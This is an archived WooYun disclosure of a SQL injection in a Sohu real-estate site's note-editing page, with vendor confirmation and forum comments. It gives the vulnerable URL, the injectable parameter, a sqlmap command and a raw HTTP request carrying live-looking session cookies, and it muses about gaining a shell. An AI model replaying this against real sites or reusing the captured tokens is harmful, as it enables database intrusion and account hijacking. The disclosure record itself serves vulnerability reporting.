搜狐(第二季)旗下某站主域名sql注入第六集(越来越少吖)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-069204

漏洞标题：搜狐(第二季)旗下某站主域名sql注入第六集(越来越少吖)

漏洞作者：浩天

提交时间：2014-07-21 16:14

修复时间：2014-09-04 16:16

公开时间：2014-09-04 16:16

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-07-21：细节已通知厂商并且等待厂商处理中
2014-07-21：厂商已经确认，细节仅向厂商公开
2014-07-31：细节向核心白帽子及相关领域专家公开
2014-08-10：细节向普通白帽子公开
2014-08-20：细节向实习白帽子公开
2014-09-04：细节向公众公开

简要描述：

平台不太稳定，闲下来看了一眼，还能找到，不容吖

详细说明：

地址：http://home.focus.cn/zxrj/note_edit.php?action=edit&this_login_id=46028393&note_id=369216
需要登录，注入点：note_id=

sqlmap -r "d:\1.txt"

1.txt

GET /zxrj/note_edit.php?note_id=369216&action=edit&this_login_id=46028393 HTTP/1.1
Host: home.focus.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: ppinf=2|1405925995|1407135595|bG9naW5pZDowOnx1c2VyaWQ6MTg6Y2hhcmxlczJoQGZvY3VzLmNufHNlcnZpY2V1c2U6MzA6MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwfGNydDoxMDoyMDExLTA4LTEyfGVtdDoxOjB8YXBwaWQ6NDoxMDI4fHRydXN0OjE6MXxwYXJ0bmVyaWQ6MTowfHJlbGF0aW9uOjA6fHV1aWQ6MTY6YjY5YzEwY2Y0ZDQ2NGJjZnx1aWQ6OTpmNDIwNjk2MzR8dW5pcW5hbWU6NDQ6JUU2JTkwJTlDJUU3JThCJTkwJUU3JUJEJTkxJUU1JThGJThCOTIxMDk5MzV8; pprdig=5CnWdje747Rq_ML1q8Gkl2fuxZyusOJCwy5nkBrnoRco_B4ZU3TTa0vmvZm1WdEk2OJrVV_nio3nRbKgCmPyvPQR7YgF4CGSwCRVOxvOINzHurj1D0nGvOiOgu5vYbsEq0SlpFa05FxOlnC1I28ql8G2U73iYAKTfcS2G6YmA-0; lastdomain=1407135595|Y2hhcmxlczJoQGZvY3VzLmNufA|focus.cn; ppmdig=14059259954851699cef15eb6cefce2955177e5f969d4cf2; house_session_id=ec07bfec1e2dadf4ab5478f5f98108b4bG9naW5faWQ9NDYwMjgzOTMmbG9naW5fbmFtZT1jaGFybGVzMmgmaGF1c3I9MCZzcHVpZD1jaGFybGVzMmhAZm9jdXMuY24%3D; PHPSESSID=2fu9t4ubhr5euqme6r8igop3j2; PHPSESSID=2fu9t4ubhr5euqme6r8igop3j2
Connection: keep-alive

漏洞证明：

注入点是整型，貌似知道路径可以shell??
看看坑爹的搜索引擎

翻翻估计home的也能找到，就这样吧

修复方案：

上次收到4个小狐狸，很开心吖
还有么

版权声明：转载请注明来源浩天@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2014-07-21 16:32

厂商回复：

感谢对搜狐的支持

漏洞评价：

2014-07-21 16:30 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了，跪着也要...)

浩天叔啊，你说你最近天天带你进深山钓鱼。。你竟然不带我挖掘SOHO的洞。。哎呀。。无节操了。楼下注意队形。。。
2014-07-23 10:46 | 小杰哥 ( 普通白帽子 | Rank:155 漏洞数:25 | 逆水行舟，不进则退。)

浩天叔啊，你说你最近天天带你进深山钓鱼。。你竟然不带我挖掘SOHO的洞。。哎呀。。无节操了。楼下注意队形。。。
2014-07-23 11:22 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了，跪着也要...)

打错了。。是sohu哈哈
2014-08-20 17:03 | kydhzy ( 普通白帽子 | Rank:362 漏洞数:62 | 软件测试)

sqlmap -r "d:\1.txt" http://home.focus.cn/zxrj/note_edit.php?action=edit&this_login_id=46028393&note_id=369216那这个地址是放哪个位置就指导
2014-09-04 16:45 | 卡卡 ( 普通白帽子 | Rank:447 漏洞数:52 | <script>alert('安全团队长期招人')</scrip...)

浩天大哥上梁山带我当好汉
2014-09-04 18:51 | Moo ( 路人 | Rank:8 漏洞数:3 | PS：不打脸，还要泡妞呢)

@kydhzy GET /zxrj/note_edit.php?note_id=369216&action=edit&this_login_id=46028393 HTTP/1.1Host: home.focus.cn

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-069204

漏洞标题：搜狐(第二季)旗下某站主域名sql注入第六集(越来越少吖)

相关厂商：搜狐

漏洞作者：浩天

提交时间：2014-07-21 16:14

修复时间：2014-09-04 16:16

公开时间：2014-09-04 16:16

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源浩天@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-069204

漏洞标题：搜狐(第二季)旗下某站主域名sql注入第六集(越来越少吖)

相关厂商：搜狐

漏洞作者： 浩天

提交时间：2014-07-21 16:14

修复时间：2014-09-04 16:16

公开时间：2014-09-04 16:16

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-069204"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 浩天@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：浩天

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源浩天@乌云